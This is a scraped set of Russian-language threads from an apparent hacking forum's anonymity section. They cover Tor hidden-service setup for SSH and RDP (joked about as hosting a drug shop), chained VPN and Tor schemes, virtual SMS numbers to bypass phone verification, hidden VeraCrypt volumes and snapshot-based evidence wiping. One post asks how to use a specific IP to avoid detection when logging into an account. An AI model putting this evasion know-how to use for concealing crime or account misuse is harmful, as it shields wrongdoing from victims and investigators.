Аддон от разработчиков Firefox, направленный прицельно против Facebook. Он блокирует сбор данных о пользователе этой социальной сетью не только внутри самой Facebook, но и на всех аффилированных сайтах, включая Instagram и Messenger. Кроме того, размещенные на любой веб-странице фейсбучные кнопки Like и Share отслеживают, что ты заходил на эту страницу, даже если ты их не нажимал, — при условии, что ты залогинен в социальной сети. Facebook Container блокирует эту активность и удаляет «шпионские» кнопки с веб-страниц.

Используй данный плагин, если не хочешь делиться с Марком Цукербергом историей своего веб-серфинга и передавать ему сведения о своей активности в сети.

Несомненно, этот список плагинов далеко не полон — при желании ты можешь найти множество других бесплатных расширений для Firefox, которые сделают твой браузер еще более безопасным и позаботятся о конфиденциальности. Мы рассмотрели только самые известные из них, которые могут удовлетворить большую часть потребностей даже самого искушенного пользователя. Будем рады, если в комментариях ты поделишься и своими интересными находками.

Автор Валентин Холмогоров
http://holmogorov.ru

Используем TOR правильно

ID: 676533bbb4103b69df371cab
Thread ID: 41100
Created: 2020-08-19T20:22:30+0000
Last Post: 2020-08-21T10:20:32+0000
Author: one
Prefix: Статья
Replies: 3 Views: 2K

Доброго времени суток форумчане.

Если Вы используете TOR, исключительно для отоваривания спайсухой на гидре(мои маленькие гидранты :3) то эта статья точно для Вас!

Минимум теории

Когда вы используете TOR для доступа в клирнет(например открывая веб-ресурс https://xss.is) Ваш трафик использует Exit Node(на картинке exit relay) и расшифровывается на ней, после чего проксируется в клирнет(см. Интернет). Проблем тут масса, от перехвата незашифрованных каналов связи до sslstrip и др. mitm), о чем написанно избыточное количество статей.

Когда вы используете TOR для доступа в onion (например https://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion) Ваш трафик остается в сети onion, т.е. расшифровывается локально на пеке, на которой запущен hidden service

Рисунок 1 - Схема работы сети TOR (нагло спижен)

Hidden Services
Будучи смекалистым пареньком, маленький гидрант сошкребая языком остатки мефа с зипа подумывал на тему а как сделать свой ~~наркошоп~~ сервис через hidden service? И мастер(я) таки решил внести вклад на форум.
Правило №1: Все что оборачивается в socks может работать через hidden service.

1. ssh over tor
Для того что бы подключаться к ssh через tor(не через exit node!) нужно сделать следующее:
Устанавливаем тор, неткат, текстовый редактор(при условии что ssh уже установлен)

Code:Copy to clipboard

[yum / apt] install -y tor ncat [nano / vim]

Редактируем конфиг тор, раскомментируем строки

Code:Copy to clipboard

HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 22 127.0.0.1:22

Сохраняем файл, перезагружаем тор

Code:Copy to clipboard

service tor restart

Если ты был не сильно упорот и скопипастил все правильно, то в папке /var/lib/tor/hidden_service/ появятся файлы hostname, private_key(возможны вариации в зависимости от версии tor)

В файле hostname будет ссыль на твой ~~наркошоп~~ скрытый сервис!

Но запомнить его после мефедроновых марафонов весьма сложно Поэтому редактируем у себя файл конфигурации ssh клиента

Code:Copy to clipboard

nano ~/.ssh/config

добавляем в него строки

Code:Copy to clipboard

host ssh_xss hostname hydrahuisosi5961.onion proxyCommand ncat --proxy 127.0.0.1:9050 --proxy-type socks5 %h %p

Где в hostname прописываем хостнейм сгенерреный при запуске сервиса тор. Сохраняем файл и пробуем подключится по хостнейму:

ssh ssh_xss

Теперь во всех логах твоей впски будет только 127.0.0.1, однако не спеши бежать за новым кладом!

Do it RIGHT!

Сейчас ты похож на страуса, т.к. твое лицо зарыто в песок(tor) а жопа торчит наружу(internet) ибо ssh-демон все еще слушает на 0.0.0.0:22, т.е ты можешь подключится к нему как через прямой ip, так и через tor hidden service.
Если тебя это не парит - забей, если ты такой же параноик как я - редактируй файл /etc/ssh/sshd_config и допиши строку ListenAddress 127.0.0.1, а затем перезапусти сервис командой

Code:Copy to clipboard

service ssh restart

Если ты все сделал правильно, то из интернета не будет видно ssh. Проверить можно, например вот так

Бонус. Что бы сгенерить красивое имя, можно использовать софт eschalot, по сути он генерит ключи для tor и выводит подходящий под заданный pattern

Code:Copy to clipboard

./eschalot -vt8 -p hixss

Копируем все от
-----BEGIN RSA PRIVATE KEY-----
до
-----END RSA PRIVATE KEY-----
включительно в файл на впске**/var/lib/tor/hidden_service/private_key**
перезапускаем сервис командойservice tor restart
изменяем у себя хостнейм в ~/.ssh/config
все!

GOING DEEPER

А Я НА ВЕНДЕ СЕЖУ - провопите Вы, мои гидранты-форточники, однако смекалка и внимательность не всегда идут в след за мефомарафоннами. Повтою:
Правило №1: Все что оборачивается в socks может работать через hidden service.
т.е и веб и рдп и смб и фтп и все что работает через сокс можно обернуть в тор! Приступим!
Качаем tor expert bundle тут

Распаковываем все из архива куда угодно(например в корень С:\)

Создаем файлик C:\torrc.txt

открываем терминал с правами администратора и переходим в папку где распакован тор и пишем команду:

Если все сделано правильно, тор будет запущен сервисом

И в папке C:\hs будет файл hostname с заветным хостнеймом Вашего ~~наркошопа~~ hidden service на винде!

Подключаться к такому рдп для линукс:
proxychains xfreerdp /v:*****.onion
proxychains rdesktop ******.onion

Если с винды, то нужно установить proxifier и создать правило для mstsc.exe - переадресация всего трафика на прокси тор(127.0.0.1:9050)

Специально и эксклюзивно для xss.is!

Tor Exit Node на Windows 10

ID: 676533bbb4103b69df371cad
Thread ID: 40574
Created: 2020-08-06T13:10:05+0000
Last Post: 2020-08-13T17:18:07+0000
Author: Grotendique
Replies: 17 Views: 2K

Уважаемый знатоки, буду рад, если кто поделиться опытом поднятия выходного узла Tor на базе Win10.
Знаю, что мануалов много, но в большинстве случаев, примеры на линукс системах.
Заранее благодарен.

Отредактировал я файл torrc , добавил туда эти строки:
ORPort 9001
ContactInfo grotendique@secmail.pro
NickName ExitGuard
ExitRelay 1
Log notice file C:\Users\MyPC\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\notice.log
ExitPolicy accept *:80
ExitPolicy accept *:443
[... many more ExitPolicy lines based on my desired exit policy ...]
[... the order of ExitPolicy lines does matter: first match wins ...]
ExitPolicy reject :

В итоге, браузер TOR не запускаеться, выдавая ошибку. И я не уверен, что exit node все таки запустился....

Backdoors и шпионы. Методы защиты

ID: 676533bbb4103b69df371cb0
Thread ID: 40690
Created: 2020-08-09T03:46:47+0000
Last Post: 2020-08-09T18:38:21+0000
Author: Benihowy
Prefix: Статья
Replies: 2 Views: 2K

Наверное, сейчас не кто не удивится, тем, что железо имеет бэкдоры и операционная система шпионит за нами. Если на понятном языке, бэкдор - это скрытая дверь, ключи и точное расположение которой знает производитель продукта, которым мы пользуемся.
Cтоит упомянуть про Intel ME, с помощью которого можно получить доступ к компьютеру, даже когда он выключен (чипсет всегда подключен к источнику питания, батарейке). Это автономная подсистема, встроенная почти во все чипсеты процессоров Intel с 2008 года. Она состоит из проприетарной прошивки, исполняемой отдельным микропроцессором. Не будем углубляться в возможности этой системы, важно знать, что она есть и работает всегда.
Рассмотрим то как работает скрытый слив данных. Есть три составляющие.
- Первая – это сбор информации. Операционная система, антивирусы и тд. собирают наши данные. Обычно, сбор данных осуществляется на программном уровне, но также существует и аппаратный.
- Вторая составляющая – это отправка этих данных на сервера. Тот же Intel ME имеет доступ к стеку tcp\ip и может передавать\получать информацию во время загрузки пк.
- И третья составляющая – обработка этих данных на серверах компаний.
Так вот, если мы исключим любую из этих составляющих, то полностью защитим себя от шпионажа со стороны производителя. Давайте порассуждаем, что мы сможем отключить на первом этапе? Программные шпионы можно отключить, но довольно сложно, а вот аппаратные не получиться. Также мы не сможем повлиять на обработку данных на серверах производителя. Единственное что нам под силу, это воспрепятствовать передаче собранной информации, что мы дальше и рассмотрим.
Информация может быть передана без нашего согласия и ведома. Обойти это довольно просто, нужно отключить на роутере dhcp и тем самым сетевая карта не будет иметь выход в интернет (в биосе). Это повысит нашу самооценку до небес, а, чтобы повысить ее еще больше, нужно поставить отдельный компьютер в качестве шлюза и пропускать через него трафик (шлюз будет находится между нашим основным компьютером и модемом). Поднять на нем прокси сервер и тянуть трафик только на прокси (и должны быть разные подсети, то есть, основной пк не должен находится в той же сети в которой модем). Это на 100% защити нас от всех возможных шпионов. Информация, как и раньше будет соберется, но не сможет отправляться производителю, что делает телеметрию и прочих шпионов просто бесполезными и безопасными для пользователя.

Стоит ли доверять drweb на linux?

ID: 676533bbb4103b69df371cb1
Thread ID: 37518
Created: 2020-05-19T13:39:55+0000
Last Post: 2020-08-05T07:15:20+0000
Author: EeXau1ei
Replies: 12 Views: 2K

Поставил ради интереса в linux, проц иногда грузит, блочит некоторые сайты, сетевые запросы дублирует в netactview видно, если сразу запускать при старте ситемы то блочит работу nordvpn, не дает еще обновлять систему, сертификаты drweb в браузеры добавил. Хочеться больше секурити но досконально систему в падлу изучать. Если она не отправляет в фсб данные и нет у нее бекдоров, то норм ее в фоне держать, доп защита

Как отключить WebRTC в Android?

ID: 676533bbb4103b69df371cb9
Thread ID: 37811
Created: 2020-05-27T08:06:49+0000
Last Post: 2020-07-24T10:00:27+0000
Author: Takeshi Kovacs
Replies: 10 Views: 2K

Не на уровне браузера, а на уровне системы, чтобы приложения не палили реальный ip.

Changing IP

ID: 676533bbb4103b69df371cbf
Thread ID: 37862
Created: 2020-05-28T22:10:25+0000
Last Post: 2020-07-13T20:53:40+0000
Author: Amyweiser
Replies: 9 Views: 2K

I have an account i want to login into, but i need to use a particular ip address so i dont get spotted. can anyone guide me as to how to change my ip to that? I dont mean vpn

Не запускается ovpn на линуксе

ID: 676533bbb4103b69df371d74
Thread ID: 27588
Created: 2019-01-31T22:47:13+0000
Last Post: 2019-02-03T10:25:25+0000
Author: Мистер квак
Replies: 4 Views: 2K

Не бейте сильно, ни как не могу справиться. Нордовские .ovpn запускаются, конфиг же ни в какую.
http://prntscr.com/mezdkr
Удаляю block-outside-dns в конфиге, переименовываю(пробелы были в названии,вдруг в этом причина)
http://prntscr.com/mezdau
застывает на этом моменте
Проверил, на винде работает

Как вычислить, если на телефон установили бота андройд?

ID: 676533bbb4103b69df371cc5
Thread ID: 38820
Created: 2020-06-24T21:17:10+0000
Last Post: 2020-06-30T04:21:19+0000
Author: Makaroha99
Replies: 8 Views: 2K

Друзья, как вычислить то, что на телефон установили бота андройд?
Вчера резко пошла закачка в телефон всех приложерий. Телефон перезапустился и теперь у меня телефон исполняет херню.
Отключается микро когда не надо, происходят постоянные загрузки.
Андройд вндет себя необычно...
Такое ощцщение, что заменено обсалютно все. Как буд то произошла замена всей системы. Как это доказать или выявить? У меня такое чувство, буд то я схожу с ума. Даже сайты в гугл отличаются от тех, что были раньше.

Софт для проверки на зараженность Microsoft Office Word

ID: 676533bbb4103b69df371ccc
Thread ID: 35241
Created: 2020-02-28T15:45:32+0000
Last Post: 2020-06-16T23:24:03+0000
Author: acide
Replies: 3 Views: 2K

Софт для проверки на зараженность Microsoft Office Word ( doc , docx )
Затем извлекать XML-файл, чтобы прочитать данные.

[CLIKE]

[ 9aylas/DDE-MS_WORD-Exploit_Detector ](https://github.com/9aylas/DDE-

MS_WORD-Exploit_Detector)

Microsoft Office Word File ( doc , docx ) DDE Attack Checker By AX302 - 9aylas/DDE-MS_WORD-Exploit_Detector

github.com

[/CLIKE]

[CLIKE]
[/CLIKE]

Topsocks.io-прокси

ID: 676533bbb4103b69df371ccd
Thread ID: 36079
Created: 2020-04-04T17:46:23+0000
Last Post: 2020-06-15T14:07:54+0000
Author: topsocks
Replies: 2 Views: 2K

Самые чистые резидентские прокси с мобильных устройств, IP реальных людей и большой выбор ГЕО. Сервис закрытый, поэтому регистрация только по инвайтам.
Соксы бэкконект, подняты на мобильных устройствах кристально чистые.

topsocks.io инвайт f4a8f611

Вопрос про ТОР ?

ID: 676533bbb4103b69df371cd2
Thread ID: 37449
Created: 2020-05-18T05:49:15+0000
Last Post: 2020-05-21T13:25:23+0000
Author: X-Shar
Replies: 7 Views: 2K

Как-то разбирался с тором, вот интересно а какое преимущество дают ссылки в торе ?

Вот например, здесь на сайте есть зеркало xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion

Но ведь даже в торе лучше заходить по обычному домену, в плане безопасности, ведь в данном случае будет доп. шифрование и защита от подделки сайта, например при атаки по середине.)

Также я знаю, что в случае чернухи, так можно скрывать айпи сайта.

А какие-то преимущества такое зеркало, кроме как зеркала, на случае если заблокируют основной домен ТОР дает, или нет ?

И ещё вопрос, может кто разбирался.

Как в ТОРе происходит регистрация домена, вот я подобрал ключ, как система понимает что сайт в сети ? Что будет если кто-то с таким-же ключем стартанет сервер ТОРа ?

Например в случае ДНС, тут все понятно, сайт регистрируется на ДНС серверах, а как это происходит в ТОРе ?

Анонимность и Безопасность в Сети ч6 – Итоги и полезные советы

ID: 676533bbb4103b69df371cd9
Thread ID: 37299
Created: 2020-05-13T18:34:48+0000
Last Post: 2020-05-13T18:34:48+0000
Author: Benihowy
Prefix: Статья
Replies: 0 Views: 2K

Итак, это заключительная часть, в ней рассмотрим факторы, которые не вошли в предыдущее части.

1 .Как бы мы не старались сделать безопасную и анонимную систему, все же слабым звеном является человек. Социальная инженерия делает чудеса, пользователь сам расскажет о себе, а может, даже установит что-то зловредное. Как тогда вести себя? На форумах, мессенджерах, соц. сетях нужно вести себя с опаской, не доверять не кому кто хочет познакомится и не качать файлы. А если все же надумали качать, то вооружитесь антивирусом и сайтом virustotal. Файл открывать только в защищенной ВМ.
Любой сайт собирает информацию, особенно ее любят социальные сети, поэтому:
- Паспортные данные и реальный мобильный номер не должны быть использованы при регистрации;
- Также не рекомендуется иметь в друзьях ваших реальных друзей и переписываться с ними. По ним можно найти реальную информацию о вас;
- Нужно подумать и о технике письма. Ошибки, речевые обороты, пунктуация может связать переписку между соц. сетями и форумами;
- Не имейте ссылок на ваши фразы или профили на других сайтах;
- Логин, пароль, мобильный номер, email должны быть разными для каждого сайта.
- Мобильный телефон должен быть простым и симкарта вынута. Включение только по надобности;
- Фотографии и видео из реальной жизни должны отсутствовать.
У каждого есть эмайл адрес. Нужно искать сервер, который не требует подтверждения личности путем мобильного номера. Для регистрации лучше всего использовать генераторы логинов, паролей и ников. Есть даже генераторы личностей

Если все же требуется мобильный номер, можно выбирать виртуальные мобильные номера (Sellaite, Receive-SMS-Online, Receive-SMS, ReceiveFreeSMS). Если вы попробуете зарегистрироваться в соц. сети с этих номеров, то увидите, что номер занят. Не отчаиваетесь, номера обновляются, вам необходимо подождать, когда будет доступен новый номер, чтобы успеть зарегистрироваться первым. Некоторые компании запрещают такую регистрацию (причины, наверное, ясны - анонимность).

2. Мы настроили разделение трафика. Что нам это дало? Гугл знает какие видео мы смотрим на ютубе; вк знает какую музыку и видео мы предпочитаем в этой соц. сети; лостфилм в курсе, что мы смотрим и тд. Только вот, гугл не узнает, какие сериалы мы качаем с лостфильма, вк не узнает, что мы качаем с рутрекера и тд. На каждом сервисе мы имеем «обезличенную» личность, она будет известна в пределах того сервиса, на котором зарегистрирована и ее нельзя связать с личностью другого сервиса (если пользователь сам этого не сделает).

3. Одно время были популярны vpn double, triple, quad. Разберем, к примеру, triple vpn: трафик шифруется на вашем компьютере и передается на первый сервер vpn, затем на второй vpn сервер и затем на третий; и лишь потом третий сервер выходит в интернет от своего имени. Сервера могут находится в любой стране и из-за этого существует задержка в несколько секунд. На мой взгляд использование double и выше для достижения анонимности не разумно, так как все сервера с цепочки vpn принадлежат одной компании; и на запрос спец. служб компания даст первоначальный ip. Если вы просто не хотите, чтобы провайдер видел ваш трафик или вы, пользуетесь открытой wi-fi точкой - достаточно simple vpn (один сервер). Вы даже сможете поиграть в онлайн игры, которые не зависят от низкого пинга (Lineage 2). Однако, simple vpn не дает никакой анонимности. Предположим, что вас где-то в интернете (форум\соц. сеть) грубо оскорбили и вы не хотите с этим мирится. И у вас есть друг или брат, который работает "где надо". Если в реалии России, то достаточно ip «злословника» и точное время. Если он использует simple vpn, то его найдут в два счета. У каждого провайдера России имеется система СОРМ, которая пишет логи. Запрос к этой системе даст ответ, что с такого ip было сделано подключение на такой vpn сервер.
Для усложнения деанонимизации существуют схемы (могут быть ограниченные вашими финансовыми ресурсами). Вы можете прикрепить последовательно столько vpn, сколько захотите, чередуя их с тором, прокси, ссш. Не ищите сервера по критерию логирования. Абсолютно любой сервер ведет логи, даже если трафик не всегда записывается, то ip адреса - всегда. В целях отладки самого сервера они нужны. Логи не будут вестись только в том случае, если вы арендуете дедик, установите vpn и сами отключите их; но логи на провайдере вашего дедика вы не сможете отключить. Vpn трафик можно распознать со стороны провайдера, но расшифровать - нет. Для усложнения работы можно запустить параллельно торент и быть сидом или пиром большого количества раздач (штук 15-20 хватит). При этом ваше vpn соединения будет менее заметно на фоне огромного количества запросов торента. Существуют специальные впн’ы, которые маскируются под https трафик.
На таких виртуальных машинах можно построить любую схему и любой сложности. Рассмотрим мой старый вариант: впн => 2 параллельных тора => 2 параллельных тора => впн. С первым звеном все понятно, стоит впн клиент, а вот на втором установлено так, что трафик приходящий на прокси этой машины будет случайным образом делится между двумя цепочками тора.
С помощью proxifier сделаем разделение трафика

И впишем правила для прокси сервера

Третье звено похоже на второе, и работает по такому же принципу. Трафик третьева звена состоит из двух параллельных цепочек тора и подключается ко второму звену (ну и делится между двумя цепочками тора второго звена). Таких звеньев можно накрутить множество, стоит только помнить, это ограничивает пропускную способность и создает серьёзные задержки. В эксперименте 10ти звеньев, сайты перестают грузится вовсе.
Что касается четвертого звена – впн’а, он нужен для нормальной работы сайтов (белый айпи) и защиты от мидл атак, ведь неизвестно чья выходная нода на конце.
Также стоит понимать масштабы своего деяния (нечего общего не имею с злодеяниями). Если вы обычный юзер, который хочет, чтобы некто не узнал его интернет историю, переписку и тд, то не нужно шифровать по 2 раза все диски, устанавливать по 5 последовательных цепочек тора. Все это избыточная анонимность. Достаточно придерживаться методов, описанных в этих статьях. Когда мы приходим домой с улицы (метафорически интернет), то не складываем всю свою одежду в сейф с пятью замками?

4. Почти у каждого есть в доме такая коробочка с мигающими лампочками, через которую в дом поступает интернет. Если про защиту компьютера слышали практически все (файервол, антивирусники и тд.), то о защиты роутера могут и не подозревать. «Мол там нет нечего такого, что стоило защищать». От части это так, однако роутер «видит», пропускает через себя ваш трафик. И при взломе роутера этот трафик может идти сначала злоумышленнику, а потом уже по назначению. Также роутеры активно используются для ддос атак, посылая запросы на какой-то айпи, об этом вы даже и не догадаетесь, разве что, если будет притормаживать интернет. Для защиты любого устройства, маршрутизирующего трафик, необходимо как можно больше уменьшить вектор атаки:
- Категорически стоит запретить доступ из вне (telnet, ssh, http), а разрешить из локальной сети только айпи своего компьютера (осторожно выбирайте эту опцию, ведь можно запретить вообще любой доступ к роутеру, тут нечего не останется как сбросить настройки);
- Необходимо изменить данные пароля логина, которые стоят по умолчанию на более сложные (если проблемы с памятью – записать на бумажке и наклеить на роутер из-под низу). Однако, не на всех устройствах можно изменить логин;
- При использовании wifi необходимо воспользоваться встроенным файерволом (если он есть). Установить фильтрацию по mac-адресам устройств. Разрешить только те, которые реально используются. Остальные – запретить по умолчанию;
- Желательно изменить SSID wifi’я. По умолчанию в нем прописывается полностью или частично название и модель устройства;
- Категорически не использовать WPS при настройке wifi;
- При использовании wifi необходимо физически ограничивать доступ к сети за пределами дома или квартиры путем уменьшения уровня (силы) сигнала, если это невозможно, то лучше перейти на проводное соединение;
- Ввести DNS вручную (Google Public DNS: 8.8.8.8,; OpenDNS: 208.67.222.222, 208.67.220.220).
- Отключение UPnP. Протокол UPnP (Universal Plug and Play) включен по умолчанию на большинстве маршрутизаторов. Если есть возможность тонкой настройки его использования — это еще полбеды. Если доступны только варианты «включить» и «отключить», то лучше выбрать последний.
Почти у всех современных роутеров есть backdoor (черный ход) – удаленный доступ. Скорее всего, это происходит под влиянием спецслужб, но в случае скандала в официальных ответах всегда упоминается «техническая необходимость» или «фирменный сервис по улучшению качества связи». Конечно, возможно, есть прошивки самодельные без таких уязвимостей, только их почти некто не ставит.

5. Все прекрасно знают, что антивирусы и файерволы собирают статистику. В этой статистике может быть что угодно. Также для них бэкдор не редкость. Неоднократно был замечен в таких делах антивирус Касперского. Сам владелец выступает против анонимности и был предоставлен исходный код властям США. Что туда было внедрено или не было – неизвестно; даже если и будет, то естественно не скажут, чтобы не терять клиентов. Так как защитится от такого неприемлемого поведения программ? Ведь они будут показывать трафик, который был использован для обновлений программ и вирусных баз, а вот анонимная статистика вряд ли засветится в логах. Выход есть, как всегда решая проблему анонимности или безопасности я прибегаю к моей пламенно любимой виртуальной машине. Попробую объяснить, в поиске такого не найдете. Способ довольно прост, но сложен в реализации. Смысл заключается в том, что, надо устанавливать два файервола, я рекомендую Касперский и Агнитум. Почему они? Агнитум довольно хорош с невероятно гибкой настройкой, я им пользуюсь больше 13лет и проблемы были лишь с активацией . Он был куплен Яндексом и прекратил свое существования как программа, теперь он внедряется в Яндекс браузер или что-то такое; Касперский файервол (антивирус выключаем, он нам не к чему) также неплох. Далее потребуется две виртуальные машины, один устанавливаем файервол в одну, а другой в другую. Далее необходимо перенести одну виртуальную машну во внутрь второй. Это называется вложенной виртуализацией или виртуализация второго порядка. Трафик проходит через файервол на внешней машине, затем идет через файервол на внутренней; и после этого выходит из внутренней в интернет. Сетевые адаптеры нужно прокидывать и понимать, для того, чтобы интернет заработал на внутренней машине, сначала необходимо реплицировать реальную сетевую карточку из хоста во внешнюю машину, а патом снова реплицировать из внешней машину во внутреннюю.
Таким образом файерволы будут контролировать друг друга и абсолютно весь трафик, который через них гоняется. Остается только прописать все необходимы правила (они сложные и их много; свои примеры показать не смогу, так как перешел на ryzen, а Майкрософт до сих пор не поддерживает вложенную виртуализация для ryzen) и создать снапшоты. Необходимо понимать, что для внешней машины надо увеличить объём памяти 3-6гб (в зависимости от ОС) и поставить минимум 2х ядерный процессор. Такая виртуальная машина создает нагрузку на слабо-скоростные винчестеры, в таком случае необходимо разделить внешнюю и внутреннюю машины между двумя дисками или использовать ssd.

6. Шифруйте важные данные. Если на диске есть ну уж очень ценные файлы в не защищенном виде, удаление может и не помочь. Купите новый диск и сразу же на нем создайте криптоконтейнер; в него сохраняйте информацию.
Большинство пользователей уверена, что достаточно использовать del (мимо корзины) и информация безвозвратно перейдет в мир иной. Операционная система обрабатывает команду и производит не удаление всего файла, а лишь указатель файла (файл состоит из кусков). При наличии специального софта (r-studio или аналог) благополучно восстановит файл (в качестве эксперимента произвел сканирование своей флешки, там восстановились файлы 5ти летней давности, несмотря на то, что флешка часто использовалась для установки windows). Есть программы, которые затирают файлы (случайными данными). Может кто слышал про метод Гутманна в 35 проходов. И все равно на диске остается остаточная намагниченность ячейки, а на usb остаточный заряд. Не известно каким оборудованием (например, elcomsoft.com) обладают спец службы, но точно опережающее рыночные аналоги, и по понятным причинам это не придается огласки.

7. Пароли. Их скапливается достаточное количество и стоит задуматься про метод хранения. В браузере не нужно их хранить, также не стоит хранить на рабочем столе в виде текстового документа, для этих целей придумали менеджер паролей (например, keepass). Все пароли храним в нем, а зашифрованный файл помещаем в криптоконтейнер.

8. Бэкап – это уверенность в завтрашнем дне, как и в сегодняшнем. Крупные дата-центры теряют данные (в подстанцию гугла молния попала несколько раз подряд), а что тогда говорить про обычных пользователей? Не известно, как будет чувствовать себя жесткий диск завтра, а на нем ценная информация. Крупно повезет, если получится все восстановить, а что если криптоконтейнер частично будет поврежден? Ставим несколько дисков и объединяем их в рейды 1,5,6. Также копируем в облака, телеграм, например, имеет бездонный объём (возможно введут ограничения в будущем).

9. Защита во время простоя. Если взять офис или общежитие, то часто пользователи оставляют компьютер без присмотра, причем оставляют «как есть» (открытые программы, переписка в мессенджерах и тд., подходи и делай что угодно). Так нельзя; не поленитесь и поставьте сложный пароль и каждый раз, когда требуется отлучиться выключайте компьютер, а если на короткий промежуток времени, то блокируйте (winkey+L).

10. Используйте домашний компьютер для доступа к важной информации. Бывает необходимость зайти на какой-то ресурс из публичного места (игротека, библиотека и тд.) используя учетные данные. И с большой вероятностью можно наткнутся на кейлогер. К примеру, был такой случай, нужно было зайти на гугл аккаунт и проверить почту. Я уверен, что наш администратор собирает данные (кейлогер). Если введу логин\пароль, то эта информация буде доставлена администратору, и что он с ней сделает, не известно. И вопрос, который будет преследовать все оставшееся рабочее время «успею ли я прийти домой и сменить пароль?». В таких ситуациях можно прибегнуть к некоторым хитростям, а именно, подключатся к удаленному рабочему столу домашнего ПК, на котором, уже открыт браузер с нужным аккаунтом (либо отключить буфер обмена, и скопированные данные останутся только на удалённом столе). Используем для этого случая программу vnc (аналог rdp). Да, нам нужно ввести адрес и пароль для доступа к домашнему пк, и администратор заведения их узнает. Суть этого метода заключается в быстрой смене пароля после удачного подключения к vnc серверу. Нужно написать небольшую программу (на самом сервере), которая будет менять пароль на указанный. Я выбрал легкий язык программирования, autoit, это скриптовый язык для автоматизации задач windows, который легко справится с поставленной задачей. При смене пароля подключение останется активным, и если обладатель кейлогера захочет зайти, то не сможет. Так как vnc будет «смотреть наружу», то нужно установить некие правила файервола. Если знаете айпи адреса (хотя бы город, регион, область), с которых зайдете, то впишите их. Также следует установить детектор атак, чтобы защитится от брута.

11. DNS. На каждой виртуальной машине, где необходимо, устанавливаем yogadns (полный аналог proxifier, только работает с dns) и пропускаем dns трафик через https.

Курс по анонимности

ID: 676533bbb4103b69df371cdb
Thread ID: 36616
Created: 2020-04-21T18:22:07+0000
Last Post: 2020-05-11T09:48:12+0000
Author: Project_9
Replies: 8 Views: 2K

Курс по анонимности -> https://mega.nz/file/vTxVDS5S#-n3yXZd7fVSSOQpUr74QG1BWyncFpGnHUkn-Cvl4qPA

Формат: Видео
Длительность ~ 11ч.
Язык: Русский
Размер 1.47 гб.

Пароль - "@infor_sliv"
Возможно кому-то будет полезно. Много воды и пустой траты временни, но есть и интересная информация.

Telegram. Храним файлы анонимно и безопасно

ID: 676533bbb4103b69df371cdc
Thread ID: 37109
Created: 2020-05-06T21:20:35+0000
Last Post: 2020-05-10T13:00:22+0000
Author: Benihowy
Prefix: Статья
Replies: 4 Views: 2K

Из всех способов хочу выделить те, которые позволяют хранить информацию удаленно. На мой взгляд самое надежное скрытие информации, это ее полное отсутствие на компьютере. Для работы нам понадобится виртуальная машина, воспользуемся встроенной в операционную систему hyper-v (можно использовать и другим вендором). Сама же хостовая ОС должна не иметь выхода в интернет.
В виртуальной машине устанавливаем ОС; рассмотрим одну из первых редакций windows 8. Устанавливаем на нее файервол, и несколько программ генерирующих трафик, например, браузер, торент. Запрещаем файерволом любой трафик между windows 8 и интернетом. Создаем два телеграм аккаунта (основной и мнимый). Логинимся первым из них и записываем туда якобы важную информацию.
Теперь создаем точку восстановления состояния (снапшот). Во избежание проблем, стоит создавать снапшот только в выключенном состоянии

Смысл снапшота в том, что вся информация, которая была после, может быть быстро стерта, и довольно проблематичная к восстановлению. Не стоит снапшот путать с бекапом.
Теперь устанавливаем веракрипт (или аналог) и логинимся мнимым аккаунтом. Записываем важные данные, предварительно зашифровав их в контейнер. То есть, в телеграме находится сам контейнер, который скачивается и отправляется обратно. Стоит помнить некоторые ограничения телеграма, такие как размер передаваемого файла в 1.5Гб и срок годности самого аккаунта – 2 месяца, с момента последнего входа. После работы с важными файлами следует применить снапшот, тем самым стерев всю историю. Машина с мнимым аккаунтом должна быть запущена всегда, и генерировать трафик. Также через случайные промежутки времени нужно применять снапшот.
Такой метод позволит показать вашу машину третим лицам без опаски, и добровольно. Разумеется, сим карты не должны лежать на виду; не стану говорить про мобильный номер, какой оператор выбирать и тд.
P.S. телеграм очень удобен для хранения бэкапов.

YogaDNS – управление днс трафиком

ID: 676533bbb4103b69df371cdd
Thread ID: 37107
Created: 2020-05-06T18:25:54+0000
Last Post: 2020-05-08T09:39:35+0000
Author: Benihowy
Prefix: Статья
Replies: 4 Views: 2K

Тем, кто сталкивался с программой proxifier, возможно слышали, про разработку yogadns от этого же автора. YogaDNS может работать с несколькими dns серверами одновременно, перенаправляя трафик на них путем правил (полный аналог с proxifier). Можно каждый запрос отправлять на любой dns сервер

Очень интересная фишка, то, что есть возможность пробрасывать dns трафик через tcp, а не через udp, как это является по умолчанию

![](/proxy.php?image=https%3A%2F%2Fsun9-26.userapi.com%2FuGyRozaATln0TaPLshf1ThnB- VVmjkVJcLGIFQ%2Ftt83TLOtkwc.jpg&hash=b80b37f24a338517d584086fdfcb9196)

Единственное, что бы трафик пробрасывался, следует в первый раз запуска программы выбрать второй пункт. Первый пункт меню пробрасывает dns напрямую

Также можно tcp трафик (ранее преобразованный из udp) пробросить на прокси используя proxifier

VeraCrypt. Надежно скрываем данные и операционную систему

ID: 676533bbb4103b69df371ce2
Thread ID: 37034
Created: 2020-05-04T17:35:52+0000
Last Post: 2020-05-06T06:07:24+0000
Author: Benihowy
Prefix: Статья
Replies: 1 Views: 2K

Все знают и помнят TrueCrypt, который был закрыт в 2014 году. И эстафету принял(а) VeraCrypt. Программа служит для создания криптоконтейнера и выполнения надежного шифрования данных «на лету». Создание простого тома не составит труда, достаточно следовать советам мастера. Гораздо интереснее рассмотреть создание скрытого содержимого.

Приступим к созданию скрытого тома. После нажатия кнопки «создать том» сражу же идет выбор последующего действия; выберем первый пункт

Так как обычный контейнер мало чем интересен (есть файл и есть пароль). В качестве теста создадим скрытый, так называемый «с двойным дном»

То есть, теперь будут два пароля, первый пароль монтирует внешний том, а второй пароль монтирует скрытый том внутри внешнего тома. Скрытый том создается в свободном месте в зашифрованого внешнего тома. Если у нас внешний том 10ГБ, то скрытый том не может быть больше 10ГБ

Даже если внешний том смонтирован, невозможно доказать, что он содержит в себе еще один скрытый том, так как свободное место в любом внешнем томе VeraCrypt заполняет случайными данными. Если мы ранее создавали обычный том, то внутри можно создать скрытый том, выбрав второй пункт (если скрытый том уже был создан, то прямой режим перезапишет его)

